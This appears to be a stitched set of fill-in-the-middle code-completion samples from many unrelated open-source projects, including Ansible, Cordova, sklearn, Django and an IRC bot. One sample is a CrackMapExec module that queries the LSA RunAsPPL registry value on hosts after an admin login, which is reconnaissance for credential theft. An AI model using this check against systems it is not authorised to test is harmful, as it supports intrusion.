sLog->outDebug(LOG_FILTER_NETWORKIO, "WORLD: Sent SMSG_QUESTGIVER_REQUEST_ITEMS NPCGuid=%u, questid=%u", GUID_LOPART(npcGUID), quest->GetQuestId()); }<|fim▁end|>
{ ClearMenu(); }
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */<|fim▁hole|> #![allow(missing_copy_implementations)] extern crate azure; extern crate cssparser; extern crate geom; extern crate gfx; extern crate util; pub mod canvas_paint_task;<|fim▁end|>
#![feature(core)] #![feature(collections)]
<|file_name|>23.py<|end_file_name|><|fim▁begin|>import copy def execute(moves): players = [ {'name': 'Xena', 'score': 0}, {'name': 'Ophelia', 'score': 0}, ] idx = 0 first_player = 0 draw_count = 0 move_count = 0 init_map = [[False]*3, [False]*3, [False]*3] map = copy.deepcopy(init_map) for move in moves: move = int(move) player_idx = (idx + first_player) % 2 player = players[player_idx] idx += 1 row = (move - 1) // 3 column = (move - 1) % 3 move_count += 1 map[row][column] = 'X' if player_idx == first_player else 'O' done = False if (check_winning(map)): done = True draw_count = 0 players[player_idx]['score'] += 1 first_player = 0 if player_idx else 1 print("win " + str(player_idx))<|fim▁hole|> draw_count += 1 print("draw") if draw_count == 3: print("three draws, resetting") draw_count = 0 first_player = 0 if first_player else 1 if done: idx = 0 print_map(map) move_count = 0 map = copy.deepcopy(init_map) print(players) def print_map(map): for row in map: for column in row: print(column if column else '.', end='') print('') print('') def check_winning(map): if map[1][1] and map[0][0] == map[1][1] == map[2][2]: print("win diag 1") return map[0][0] if map[1][1] and map[0][2] == map[1][1] == map[2][0]: print("win diag 2") return map[0][2] for i in range(0, 3): if map[i][0] and map[i][0] == map[i][1] == map[i][2]: print("win vertical " + str(i)) return map[i][0] if map[0][i] and map[0][i] == map[1][i] == map[2][i]: print("win horizontal " + str(i)) return map[0][i] return None execute(open("input/dec23").read())<|fim▁end|>
elif move_count == 9: done = True
<|file_name|>role.py<|end_file_name|><|fim▁begin|>######################################################################## # # (C) 2015, Brian Coca <[email protected]> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ######################################################################## from __future__ import (absolute_import, division, print_function) __metaclass__ = type import datetime import os import tarfile import tempfile import yaml from distutils.version import LooseVersion from shutil import rmtree import ansible.constants as C from ansible.errors import AnsibleError from ansible.module_utils.urls import open_url from ansible.playbook.role.requirement import RoleRequirement from ansible.galaxy.api import GalaxyAPI try: from __main__ import display except ImportError: from ansible.utils.display import Display display = Display() class GalaxyRole(object): SUPPORTED_SCMS = set(['git', 'hg']) META_MAIN = os.path.join('meta', 'main.yml') META_INSTALL = os.path.join('meta', '.galaxy_install_info') ROLE_DIRS = ('defaults','files','handlers','meta','tasks','templates','vars','tests') def __init__(self, galaxy, name, src=None, version=None, scm=None, path=None): self._metadata = None self._install_info = None self._validate_certs = not galaxy.options.ignore_certs display.debug('Validate TLS certificates: %s' % self._validate_certs) self.options = galaxy.options self.galaxy = galaxy self.name = name self.version = version self.src = src or name self.scm = scm if path is not None: if self.name not in path: path = os.path.join(path, self.name) self.path = path else: for role_path_dir in galaxy.roles_paths: role_path = os.path.join(role_path_dir, self.name) if os.path.exists(role_path): self.path = role_path break else: # use the first path by default self.path = os.path.join(galaxy.roles_paths[0], self.name) # create list of possible paths self.paths = [x for x in galaxy.roles_paths] self.paths = [os.path.join(x, self.name) for x in self.paths] def __repr__(self): """ Returns "rolename (version)" if version is not null Returns "rolename" otherwise """ if self.version: return "%s (%s)" % (self.name, self.version) else: return self.name def __eq__(self, other): return self.name == other.name @property def metadata(self): """ Returns role metadata """ if self._metadata is None: meta_path = os.path.join(self.path, self.META_MAIN) if os.path.isfile(meta_path): try: f = open(meta_path, 'r') self._metadata = yaml.safe_load(f) except: display.vvvvv("Unable to load metadata for %s" % self.name) return False finally: f.close() return self._metadata @property def install_info(self): """ Returns role install info """ if self._install_info is None: info_path = os.path.join(self.path, self.META_INSTALL) if os.path.isfile(info_path): try: f = open(info_path, 'r') self._install_info = yaml.safe_load(f) except: display.vvvvv("Unable to load Galaxy install info for %s" % self.name) return False finally: f.close() return self._install_info def _write_galaxy_install_info(self): """ Writes a YAML-formatted file to the role's meta/ directory (named .galaxy_install_info) which contains some information we can use later for commands like 'list' and 'info'. """ info = dict( version=self.version, install_date=datetime.datetime.utcnow().strftime("%c"), ) if not os.path.exists(os.path.join(self.path, 'meta')): os.makedirs(os.path.join(self.path, 'meta')) info_path = os.path.join(self.path, self.META_INSTALL) with open(info_path, 'w+') as f: try: self._install_info = yaml.safe_dump(info, f) except: return False return True def remove(self): """ Removes the specified role from the roles path. There is a sanity check to make sure there's a meta/main.yml file at this path so the user doesn't blow away random directories. """ if self.metadata: try: rmtree(self.path) return True except: pass return False def fetch(self, role_data): """ Downloads the archived role from github to a temp location """ if role_data: # first grab the file and save it to a temp location if "github_user" in role_data and "github_repo" in role_data:<|fim▁hole|> archive_url = self.src display.display("- downloading role from %s" % archive_url) try: url_file = open_url(archive_url, validate_certs=self._validate_certs) temp_file = tempfile.NamedTemporaryFile(delete=False) data = url_file.read() while data: temp_file.write(data) data = url_file.read() temp_file.close() return temp_file.name except Exception as e: display.error("failed to download the file: %s" % str(e)) return False def install(self): # the file is a tar, so open it that way and extract it # to the specified (or default) roles directory local_file = False if self.scm: # create tar file from scm url tmp_file = RoleRequirement.scm_archive_role(**self.spec) elif self.src: if os.path.isfile(self.src): # installing a local tar.gz local_file = True tmp_file = self.src elif '://' in self.src: role_data = self.src tmp_file = self.fetch(role_data) else: api = GalaxyAPI(self.galaxy) role_data = api.lookup_role_by_name(self.src) if not role_data: raise AnsibleError("- sorry, %s was not found on %s." % (self.src, api.api_server)) if role_data.get('role_type') == 'CON' and not os.environ.get('ANSIBLE_CONTAINER'): # Container Enabled, running outside of a container display.warning("%s is a Container Enabled role and should only be installed using " "Ansible Container" % self.name) if role_data.get('role_type') == 'APP': # Container Role display.warning("%s is a Container App role and should only be installed using Ansible " "Container" % self.name) role_versions = api.fetch_role_related('versions', role_data['id']) if not self.version: # convert the version names to LooseVersion objects # and sort them to get the latest version. If there # are no versions in the list, we'll grab the head # of the master branch if len(role_versions) > 0: loose_versions = [LooseVersion(a.get('name',None)) for a in role_versions] loose_versions.sort() self.version = str(loose_versions[-1]) elif role_data.get('github_branch', None): self.version = role_data['github_branch'] else: self.version = 'master' elif self.version != 'master': if role_versions and str(self.version) not in [a.get('name', None) for a in role_versions]: raise AnsibleError("- the specified version (%s) of %s was not found in the list of available versions (%s)." % (self.version, self.name, role_versions)) tmp_file = self.fetch(role_data) else: raise AnsibleError("No valid role data found") if tmp_file: display.debug("installing from %s" % tmp_file) if not tarfile.is_tarfile(tmp_file): raise AnsibleError("the file downloaded was not a tar.gz") else: if tmp_file.endswith('.gz'): role_tar_file = tarfile.open(tmp_file, "r:gz") else: role_tar_file = tarfile.open(tmp_file, "r") # verify the role's meta file meta_file = None members = role_tar_file.getmembers() # next find the metadata file for member in members: if self.META_MAIN in member.name: meta_file = member break if not meta_file: raise AnsibleError("this role does not appear to have a meta/main.yml file.") else: try: self._metadata = yaml.safe_load(role_tar_file.extractfile(meta_file)) except: raise AnsibleError("this role does not appear to have a valid meta/main.yml file.") # we strip off the top-level directory for all of the files contained within # the tar file here, since the default is 'github_repo-target', and change it # to the specified role's name installed = False while not installed: display.display("- extracting %s to %s" % (self.name, self.path)) try: if os.path.exists(self.path): if not os.path.isdir(self.path): raise AnsibleError("the specified roles path exists and is not a directory.") elif not getattr(self.options, "force", False): raise AnsibleError("the specified role %s appears to already exist. Use --force to replace it." % self.name) else: # using --force, remove the old path if not self.remove(): raise AnsibleError("%s doesn't appear to contain a role.\n please remove this directory manually if you really want to put the role here." % self.path) else: os.makedirs(self.path) # now we do the actual extraction to the path for member in members: # we only extract files, and remove any relative path # bits that might be in the file for security purposes # and drop the leading directory, as mentioned above if member.isreg() or member.issym(): parts = member.name.split(os.sep)[1:] final_parts = [] for part in parts: if part != '..' and '~' not in part and '$' not in part: final_parts.append(part) member.name = os.path.join(*final_parts) role_tar_file.extract(member, self.path) # write out the install info file for later use self._write_galaxy_install_info() installed = True except OSError as e: error = True if e[0] == 13 and len(self.paths) > 1: current = self.paths.index(self.path) nextidx = current + 1 if len(self.paths) >= current: self.path = self.paths[nextidx] error = False if error: raise AnsibleError("Could not update files in %s: %s" % (self.path, str(e))) # return the parsed yaml metadata display.display("- %s was installed successfully" % str(self)) if not local_file: try: os.unlink(tmp_file) except (OSError,IOError) as e: display.warning("Unable to remove tmp file (%s): %s" % (tmp_file, str(e))) return True return False @property def spec(self): """ Returns role spec info { 'scm': 'git', 'src': 'http://git.example.com/repos/repo.git', 'version': 'v1.0', 'name': 'repo' } """ return dict(scm=self.scm, src=self.src, version=self.version, name=self.name)<|fim▁end|>
archive_url = 'https://github.com/%s/%s/archive/%s.tar.gz' % (role_data["github_user"], role_data["github_repo"], self.version) else:
<|file_name|>manage.py<|end_file_name|><|fim▁begin|><|fim▁hole|>import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "fiveLessons.settings") from django.core.management import execute_from_command_line execute_from_command_line(sys.argv)<|fim▁end|>
#!/usr/bin/env python import os
<|file_name|>speedMultiplierSpecs.tsx<|end_file_name|><|fim▁begin|>import * as React from "react"; import { mount, ReactWrapper } from "enzyme"; import { matchers } from "@emotion/jest"; expect.extend(matchers); type ExpectFunc = (loader: ReactWrapper, multiplier: number) => void; function speedMultiplierSpecs(Loader: typeof React.Component, expectFunction: ExpectFunc): void { describe("speedMultipler props", () => { let loader = mount(<Loader />); it("should use default speed and delay if speedMultipler is not passed in", () => { expectFunction(loader, 1); }); it("should double the animation speed if passed in as 2", () => { const speedMultiplier = 2; loader = mount(<Loader speedMultiplier={speedMultiplier} />); expectFunction(loader, 0.5); }); it("should half the animation speed if passed in as 0.5", () => { const speedMultiplier = 0.5;<|fim▁hole|> }); it("should stop animating if passed in as 0", () => { const speedMultiplier = 0; loader = mount(<Loader speedMultiplier={speedMultiplier} />); expectFunction(loader, Infinity); }); }); } export default speedMultiplierSpecs;<|fim▁end|>
loader = mount(<Loader speedMultiplier={speedMultiplier} />); expectFunction(loader, 2);
<|file_name|>time.py<|end_file_name|><|fim▁begin|>from .game import Board<|fim▁hole|> print(i)<|fim▁end|>
for i in range(10): Board.all()
<|file_name|>passeador.model.ts<|end_file_name|><|fim▁begin|>/** * Created by andypax on 15/10/16. */ export class PasseadorModel { constructor( public nome?: string, public sobreNome?: string, public endereco?: string, public numero?: string, public complemento?: string, public cidade?: string, public cep?: string,<|fim▁hole|> public email?: string, public preco?: number, public login?: string, public senha?: string, public confirmarSenha?: string ){} }<|fim▁end|>
public estado?: string, public telefone?: string, public celular?: string, public foto?: string,
<|file_name|>crud.rs<|end_file_name|><|fim▁begin|>#![cfg_attr(all(feature = "unstable", test), feature(test))] #[macro_use] extern crate serde_derive;<|fim▁hole|>extern crate arthas_derive; extern crate rand; extern crate arthas; extern crate env_logger; #[path = "../tests/common/mod.rs"] pub mod common; #[path = "../tests/model/mod.rs"] pub mod model; #[cfg(all(feature = "unstable", test))] mod benches { extern crate test; use model::*; use super::common::setup; #[bench] fn bench_a_insert(b: &mut test::Bencher) { setup(); b.iter(|| { Article::session() .insert(Article::new("Hello world!")) .unwrap() }) } #[bench] fn bench_find(b: &mut test::Bencher) { setup(); b.iter(|| { Article::session() .field("title") .eq("Hello world!") .limit(100) .find() .unwrap() }) } }<|fim▁end|>
#[macro_use]
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>""" The :mod:`sklearn.metrics` module includes score functions, performance metrics and pairwise metrics and distance computations. """ from . import cluster from .classification import accuracy_score from .classification import brier_score_loss from .classification import classification_report from .classification import confusion_matrix from .classification import f1_score from .classification import fbeta_score from .classification import hamming_loss from .classification import hinge_loss from .classification import jaccard_similarity_score from .classification import log_loss from .classification import matthews_corrcoef from .classification import precision_recall_fscore_support from .classification import precision_score from .classification import recall_score from .classification import zero_one_loss from .cluster import adjusted_mutual_info_score from .cluster import adjusted_rand_score from .cluster import completeness_score from .cluster import consensus_score from .cluster import homogeneity_completeness_v_measure from .cluster import homogeneity_score from .cluster import mutual_info_score from .cluster import normalized_mutual_info_score from .cluster import silhouette_samples from .cluster import silhouette_score from .cluster import v_measure_score from .pairwise import euclidean_distances from .pairwise import pairwise_distances from .pairwise import pairwise_distances_argmin from .pairwise import pairwise_distances_argmin_min from .pairwise import pairwise_kernels from .ranking import auc<|fim▁hole|>from .ranking import average_precision_score from .ranking import coverage_error from .ranking import label_ranking_average_precision_score from .ranking import label_ranking_loss from .ranking import precision_recall_curve from .ranking import roc_auc_score from .ranking import roc_curve from .regression import explained_variance_score from .regression import mean_absolute_error from .regression import mean_squared_error from .regression import median_absolute_error from .regression import r2_score from .scorer import SCORERS from .scorer import get_scorer from .scorer import make_scorer __all__ = [ 'accuracy_score', 'adjusted_mutual_info_score', 'adjusted_rand_score', 'auc', 'average_precision_score', 'classification_report', 'cluster', 'completeness_score', 'confusion_matrix', 'consensus_score', 'coverage_error', 'euclidean_distances', 'explained_variance_score', 'f1_score', 'fbeta_score', 'get_scorer', 'hamming_loss', 'hinge_loss', 'homogeneity_completeness_v_measure', 'homogeneity_score', 'jaccard_similarity_score', 'label_ranking_average_precision_score', 'label_ranking_loss', 'log_loss', 'make_scorer', 'matthews_corrcoef', 'mean_absolute_error', 'mean_squared_error', 'median_absolute_error', 'mutual_info_score', 'normalized_mutual_info_score', 'pairwise_distances', 'pairwise_distances_argmin', 'pairwise_distances_argmin_min', 'pairwise_distances_argmin_min', 'pairwise_kernels', 'precision_recall_curve', 'precision_recall_fscore_support', 'precision_score', 'r2_score', 'recall_score', 'roc_auc_score', 'roc_curve', 'SCORERS', 'silhouette_samples', 'silhouette_score', 'v_measure_score', 'zero_one_loss', 'brier_score_loss', ]<|fim▁end|>
<|file_name|>cordova_plugins.js<|end_file_name|><|fim▁begin|>cordova.define('cordova/plugin_list', function(require, exports, module) { module.exports = [ { "file": "plugins/cordova-plugin-device/www/device.js", "id": "cordova-plugin-device.device", "pluginId": "cordova-plugin-device", "clobbers": [ "device" ] }, { "file": "plugins/cordova-plugin-device/src/browser/DeviceProxy.js", "id": "cordova-plugin-device.DeviceProxy", "pluginId": "cordova-plugin-device", "runs": true }, { "file": "plugins/cordova-plugin-device-orientation/www/CompassError.js", "id": "cordova-plugin-device-orientation.CompassError", "pluginId": "cordova-plugin-device-orientation", "clobbers": [ "CompassError" ] }, { "file": "plugins/cordova-plugin-device-orientation/www/CompassHeading.js", "id": "cordova-plugin-device-orientation.CompassHeading", "pluginId": "cordova-plugin-device-orientation", "clobbers": [ "CompassHeading" ] }, { "file": "plugins/cordova-plugin-device-orientation/www/compass.js", "id": "cordova-plugin-device-orientation.compass", "pluginId": "cordova-plugin-device-orientation", "clobbers": [ "navigator.compass" ] }, { "file": "plugins/cordova-plugin-device-orientation/src/browser/CompassProxy.js", "id": "cordova-plugin-device-orientation.CompassProxy", "pluginId": "cordova-plugin-device-orientation", "runs": true }, { "file": "plugins/cordova-plugin-dialogs/www/notification.js", "id": "cordova-plugin-dialogs.notification", "pluginId": "cordova-plugin-dialogs", "merges": [ "navigator.notification" ] }, { "file": "plugins/cordova-plugin-dialogs/www/browser/notification.js", "id": "cordova-plugin-dialogs.notification_browser", "pluginId": "cordova-plugin-dialogs", "merges": [ "navigator.notification" ] }, { "file": "plugins/cordova-plugin-network-information/www/network.js", "id": "cordova-plugin-network-information.network", "pluginId": "cordova-plugin-network-information", "clobbers": [ "navigator.connection", "navigator.network.connection" ] }, { "file": "plugins/cordova-plugin-network-information/www/Connection.js", "id": "cordova-plugin-network-information.Connection", "pluginId": "cordova-plugin-network-information", "clobbers": [ "Connection" ] }, { "file": "plugins/cordova-plugin-network-information/src/browser/network.js", "id": "cordova-plugin-network-information.NetworkInfoProxy", "pluginId": "cordova-plugin-network-information", "runs": true }, { "file": "plugins/cordova-plugin-splashscreen/www/splashscreen.js", "id": "cordova-plugin-splashscreen.SplashScreen", "pluginId": "cordova-plugin-splashscreen", "clobbers": [ "navigator.splashscreen" ] }, { "file": "plugins/cordova-plugin-splashscreen/src/browser/SplashScreenProxy.js", "id": "cordova-plugin-splashscreen.SplashScreenProxy", "pluginId": "cordova-plugin-splashscreen", "runs": true }, { "file": "plugins/cordova-plugin-statusbar/www/statusbar.js", "id": "cordova-plugin-statusbar.statusbar", "pluginId": "cordova-plugin-statusbar", "clobbers": [ "window.StatusBar" ] }, { "file": "plugins/cordova-plugin-statusbar/src/browser/statusbar.js", "id": "cordova-plugin-statusbar.statusbar.Browser", "pluginId": "cordova-plugin-statusbar", "merges": [ "window.StatusBar" ] }, { "file": "plugins/phonegap-plugin-mobile-accessibility/www/mobile-accessibility.js", "id": "phonegap-plugin-mobile-accessibility.mobile-accessibility", "pluginId": "phonegap-plugin-mobile-accessibility", "clobbers": [ "window.MobileAccessibility" ] }, { "file": "plugins/phonegap-plugin-mobile-accessibility/www/MobileAccessibilityNotifications.js", "id": "phonegap-plugin-mobile-accessibility.MobileAccessibilityNotifications", "pluginId": "phonegap-plugin-mobile-accessibility", "clobbers": [ "MobileAccessibilityNotifications" ] }, { "file": "plugins/cordova-plugin-device-motion/www/Acceleration.js", "id": "cordova-plugin-device-motion.Acceleration", "pluginId": "cordova-plugin-device-motion", "clobbers": [ "Acceleration" ] }, { "file": "plugins/cordova-plugin-device-motion/www/accelerometer.js", "id": "cordova-plugin-device-motion.accelerometer", "pluginId": "cordova-plugin-device-motion", "clobbers": [ "navigator.accelerometer" ] }, { "file": "plugins/cordova-plugin-device-motion/src/browser/AccelerometerProxy.js", "id": "cordova-plugin-device-motion.AccelerometerProxy", "pluginId": "cordova-plugin-device-motion", "runs": true }, { "file": "plugins/cordova-plugin-globalization/www/GlobalizationError.js", "id": "cordova-plugin-globalization.GlobalizationError", "pluginId": "cordova-plugin-globalization", "clobbers": [ "window.GlobalizationError" ] }, { "file": "plugins/cordova-plugin-globalization/www/globalization.js", "id": "cordova-plugin-globalization.globalization", "pluginId": "cordova-plugin-globalization", "clobbers": [ "navigator.globalization" ] }, { "file": "plugins/cordova-plugin-globalization/www/browser/moment.js", "id": "cordova-plugin-globalization.moment", "pluginId": "cordova-plugin-globalization", "runs": true }, { "file": "plugins/cordova-plugin-globalization/src/browser/GlobalizationProxy.js", "id": "cordova-plugin-globalization.GlobalizationProxy", "pluginId": "cordova-plugin-globalization", "runs": true }, { "file": "plugins/cordova-plugin-inappbrowser/www/inappbrowser.js", "id": "cordova-plugin-inappbrowser.inappbrowser", "pluginId": "cordova-plugin-inappbrowser", "clobbers": [ "cordova.InAppBrowser.open", "window.open" ] }, { "file": "plugins/cordova-plugin-inappbrowser/src/browser/InAppBrowserProxy.js", "id": "cordova-plugin-inappbrowser.InAppBrowserProxy", "pluginId": "cordova-plugin-inappbrowser", "merges": [ "" ] }, { "file": "plugins/cordova-plugin-file/www/DirectoryEntry.js", "id": "cordova-plugin-file.DirectoryEntry", "pluginId": "cordova-plugin-file", "clobbers": [ "window.DirectoryEntry" ] }, { "file": "plugins/cordova-plugin-file/www/DirectoryReader.js", "id": "cordova-plugin-file.DirectoryReader", "pluginId": "cordova-plugin-file", "clobbers": [ "window.DirectoryReader" ] }, { "file": "plugins/cordova-plugin-file/www/Entry.js", "id": "cordova-plugin-file.Entry", "pluginId": "cordova-plugin-file", "clobbers": [ "window.Entry" ] }, { "file": "plugins/cordova-plugin-file/www/File.js", "id": "cordova-plugin-file.File", "pluginId": "cordova-plugin-file", "clobbers": [ "window.File" ] }, { "file": "plugins/cordova-plugin-file/www/FileEntry.js", "id": "cordova-plugin-file.FileEntry", "pluginId": "cordova-plugin-file", "clobbers": [ "window.FileEntry" ] }, { "file": "plugins/cordova-plugin-file/www/FileError.js", "id": "cordova-plugin-file.FileError", "pluginId": "cordova-plugin-file", "clobbers": [ "window.FileError" ] }, { "file": "plugins/cordova-plugin-file/www/FileReader.js", "id": "cordova-plugin-file.FileReader", "pluginId": "cordova-plugin-file", "clobbers": [ "window.FileReader" ] }, { "file": "plugins/cordova-plugin-file/www/FileSystem.js", "id": "cordova-plugin-file.FileSystem", "pluginId": "cordova-plugin-file", "clobbers": [ "window.FileSystem" ] }, { "file": "plugins/cordova-plugin-file/www/FileUploadOptions.js", "id": "cordova-plugin-file.FileUploadOptions", "pluginId": "cordova-plugin-file", "clobbers": [ "window.FileUploadOptions" ] }, { "file": "plugins/cordova-plugin-file/www/FileUploadResult.js", "id": "cordova-plugin-file.FileUploadResult", "pluginId": "cordova-plugin-file", "clobbers": [ "window.FileUploadResult" ] }, { "file": "plugins/cordova-plugin-file/www/FileWriter.js", "id": "cordova-plugin-file.FileWriter", "pluginId": "cordova-plugin-file", "clobbers": [ "window.FileWriter" ] }, { "file": "plugins/cordova-plugin-file/www/Flags.js", "id": "cordova-plugin-file.Flags", "pluginId": "cordova-plugin-file", "clobbers": [ "window.Flags" ] }, { "file": "plugins/cordova-plugin-file/www/LocalFileSystem.js", "id": "cordova-plugin-file.LocalFileSystem", "pluginId": "cordova-plugin-file", "clobbers": [ "window.LocalFileSystem" ], "merges": [ "window" ] }, { "file": "plugins/cordova-plugin-file/www/Metadata.js", "id": "cordova-plugin-file.Metadata", "pluginId": "cordova-plugin-file", "clobbers": [ "window.Metadata" ] }, { "file": "plugins/cordova-plugin-file/www/ProgressEvent.js", "id": "cordova-plugin-file.ProgressEvent", "pluginId": "cordova-plugin-file", "clobbers": [ "window.ProgressEvent" ] }, { "file": "plugins/cordova-plugin-file/www/fileSystems.js", "id": "cordova-plugin-file.fileSystems", "pluginId": "cordova-plugin-file" }, { "file": "plugins/cordova-plugin-file/www/requestFileSystem.js", "id": "cordova-plugin-file.requestFileSystem", "pluginId": "cordova-plugin-file", "clobbers": [ "window.requestFileSystem" ] }, { "file": "plugins/cordova-plugin-file/www/resolveLocalFileSystemURI.js", "id": "cordova-plugin-file.resolveLocalFileSystemURI", "pluginId": "cordova-plugin-file", "merges": [ "window" ] }, { "file": "plugins/cordova-plugin-file/www/browser/isChrome.js", "id": "cordova-plugin-file.isChrome", "pluginId": "cordova-plugin-file", "runs": true }, { "file": "plugins/cordova-plugin-file/www/browser/Preparing.js", "id": "cordova-plugin-file.Preparing", "pluginId": "cordova-plugin-file", "runs": true }, { "file": "plugins/cordova-plugin-file/src/browser/FileProxy.js", "id": "cordova-plugin-file.browserFileProxy", "pluginId": "cordova-plugin-file", "runs": true }, { "file": "plugins/cordova-plugin-file/www/fileSystemPaths.js", "id": "cordova-plugin-file.fileSystemPaths", "pluginId": "cordova-plugin-file", "merges": [ "cordova" ], "runs": true }, { "file": "plugins/cordova-plugin-file/www/browser/FileSystem.js", "id": "cordova-plugin-file.firefoxFileSystem",<|fim▁hole|> "pluginId": "cordova-plugin-file", "merges": [ "window.FileSystem" ] }, { "file": "plugins/cordova-plugin-media/www/MediaError.js", "id": "cordova-plugin-media.MediaError", "pluginId": "cordova-plugin-media", "clobbers": [ "window.MediaError" ] }, { "file": "plugins/cordova-plugin-media/www/Media.js", "id": "cordova-plugin-media.Media", "pluginId": "cordova-plugin-media", "clobbers": [ "window.Media" ] }, { "file": "plugins/cordova-plugin-media/www/browser/Media.js", "id": "cordova-plugin-media.BrowserMedia", "pluginId": "cordova-plugin-media", "clobbers": [ "window.Media" ] } ]; module.exports.metadata = // TOP OF METADATA { "cordova-plugin-console": "1.0.5", "cordova-plugin-device": "1.1.4", "cordova-plugin-device-orientation": "1.0.5", "cordova-plugin-dialogs": "1.2.1", "cordova-plugin-network-information": "1.2.1", "cordova-plugin-splashscreen": "3.2.2", "cordova-plugin-statusbar": "2.1.3", "cordova-plugin-whitelist": "1.2.2", "phonegap-plugin-mobile-accessibility": "1.0.5-dev", "cordova-plugin-device-motion": "1.2.4", "cordova-plugin-globalization": "1.0.6", "cordova-plugin-inappbrowser": "1.3.0", "cordova-plugin-compat": "1.1.0", "cordova-plugin-file": "4.3.2", "cordova-plugin-media": "2.2.0" } // BOTTOM OF METADATA });<|fim▁end|>
<|file_name|>runasppl.py<|end_file_name|><|fim▁begin|>class CMEModule: name = 'runasppl' description = "Check if the registry value RunAsPPL is set or not" supported_protocols = ['smb'] opsec_safe = True multiple_hosts = True def options(self, context, module_options): ''' ''' def on_admin_login(self, context, connection): command = 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL'<|fim▁hole|><|fim▁end|>
context.log.info('Executing command') p = connection.execute(command, True) context.log.highlight(p)
<|file_name|>renderers.py<|end_file_name|><|fim▁begin|>import json from rest_framework.renderers import JSONRenderer class CustomJSONRenderer(JSONRenderer): charset = 'utf-8' object_label = 'object' pagination_object_label = 'objects' pagination_count_label = 'count' def render(self, data, media_type=None, renderer_context=None): if data.get('results', None) is not None: return json.dumps({ self.pagination_object_label: data['results'], self.pagination_count_label: data['count'] }) # If the view throws an error (such as the user can't be authenticated # or something similar), `data` will contain an `errors` key. We want<|fim▁hole|> elif data.get('errors', None) is not None: return super(CustomJSONRenderer, self).render(data) return json.dumps({ self.object_label: data })<|fim▁end|>
# the default JSONRenderer to handle rendering errors, so we need to # check for this case.
<|file_name|>convert-images-spec.js<|end_file_name|><|fim▁begin|>var fs = require('fs'); var PNG = require('../lib/png').PNG; var test = require('tape'); var noLargeOption = process.argv.indexOf("nolarge") >= 0; fs.readdir(__dirname + '/in/', function (err, files) { if (err) throw err; files = files.filter(function (file) { return (!noLargeOption || !file.match(/large/i)) && Boolean(file.match(/\.png$/i)); }); console.log("Converting images"); files.forEach(function (file) { var expectedError = false; if (file.match(/^x/)) { expectedError = true; } test('convert sync - ' + file, function (t) { t.timeoutAfter(1000 * 60 * 5); var data = fs.readFileSync(__dirname + '/in/' + file); try { var png = PNG.sync.read(data); } catch (e) { if (!expectedError) { t.fail('Unexpected error parsing..' + file + '\n' + e.message + "\n" + e.stack); } else { t.pass("completed"); } return t.end(); } if (expectedError) { t.fail("Sync: Error expected, parsed fine .. - " + file); return t.end(); } var outpng = new PNG(); outpng.gamma = png.gamma; outpng.data = png.data; outpng.width = png.width; outpng.height = png.height; outpng.pack() .pipe(fs.createWriteStream(__dirname + '/outsync/' + file) .on("finish", function () { t.pass("completed"); t.end(); })); }); test('convert async - ' + file, function (t) { t.timeoutAfter(1000 * 60 * 5); fs.createReadStream(__dirname + '/in/' + file) .pipe(new PNG()) .on('error', function (err) { if (!expectedError) { t.fail("Async: Unexpected error parsing.." + file + '\n' + err.message + '\n' + err.stack);<|fim▁hole|> } else { t.pass("completed"); } t.end(); }) .on('parsed', function () { if (expectedError) { t.fail("Async: Error expected, parsed fine .." + file); return t.end(); } this.pack() .pipe( fs.createWriteStream(__dirname + '/out/' + file) .on("finish", function () { t.pass("completed"); t.end(); })); }); }); }); });<|fim▁end|>
<|file_name|>setlog.py<|end_file_name|><|fim▁begin|># Dict'O'nator - A dictation plugin for gedit. # Copyright (C) <2016> <Abhinav Singh> # # This file is part of Dict'O'nator. # # Dict'O'nator is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dict'O'nator is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Dict'O'nator. If not, see <http://www.gnu.org/licenses/>. """Sets up the logger.""" import logging import os <|fim▁hole|> if not os.path.exists(GEDIT_PLUGIN_PATH + '/.logs'): os.makedirs(GEDIT_PLUGIN_PATH + '/.logs') LOG_DIR_PATH = GEDIT_PLUGIN_PATH + "/.logs/" def setup_logger(): # setting format of log formatter = logging.Formatter('%(threadName)s - %(levelname)s - %(message)s') logger.setLevel(logging.DEBUG) # file location debug_log = LOG_DIR_PATH + 'log.txt' # adding handler for console logs sh = logging.StreamHandler() sh.setFormatter(formatter) logger.addHandler(sh) # adding handler for file logs fh = logging.FileHandler(debug_log) fh.setFormatter(formatter) logger.addHandler(fh) setup_logger()<|fim▁end|>
logger = logging.getLogger('dictonator') GEDIT_PLUGIN_PATH = os.path.dirname(os.path.abspath(__file__))
<|file_name|>ircbot.py<|end_file_name|><|fim▁begin|>'''Todo: * Add multiple thread support for async_process functions * Potentially thread each handler function? idk ''' import sys import socket import re import threading import logging import time if sys.hexversion < 0x03000000: #Python 2 import Queue as queue BlockingIOError = socket.error else: import queue from .ircclient import IRCClient logger = logging.getLogger(__name__) #Somewhat complex regex that accurately matches nick!username@host, with named groups for easy parsing and usage user_re = re.compile(r'(?P<nick>[\w\d<-\[\]\^\{\}\~]+)!(?P<user>[\w\d<-\[\]\^\{\}\~]+)@(?P<host>.+)') class IRCBot(IRCClient): '''See `IRCClient` for basic client usage, here is usage for the bot system Handler notation: on_join(self, nick, host, channel) on_topic(self, nick, host, channel, topic) on_part(self, nick, host, channel, message) on_msg(self, nick, host, channel, message) on_privmsg(self, nick, host, message) on_chanmsg(self, nick, host, channel, message) on_notice(self, nick, host, channel, message) on_nick(self, nick, new_nick, host) ''' _handlers = { 'join': [], 'part': [], 'kick': [], 'topic': [], 